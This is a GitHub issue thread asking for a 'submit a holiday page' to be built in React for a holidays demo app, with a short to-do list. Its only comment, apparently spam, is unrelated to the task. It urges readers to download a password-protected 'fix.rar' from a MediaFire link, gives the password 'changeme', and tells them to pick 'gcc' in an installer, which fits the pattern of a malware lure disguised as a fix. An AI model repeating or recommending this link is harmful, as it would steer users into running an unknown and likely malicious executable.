### ISSUE TITLE
Development: Holidays app - submit a holiday page

### ISSUE THREAD

**Issue by melaniebmn** [cds-snc/design-gc-conception#1104]
Develop the submit a holiday page for the holidays app in React.

## To do

- [ ] Set up 2-step form
- [ ] Thank you page

## Done when:

- [ ] Merged into `gcds-examples/fable-test-app`

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
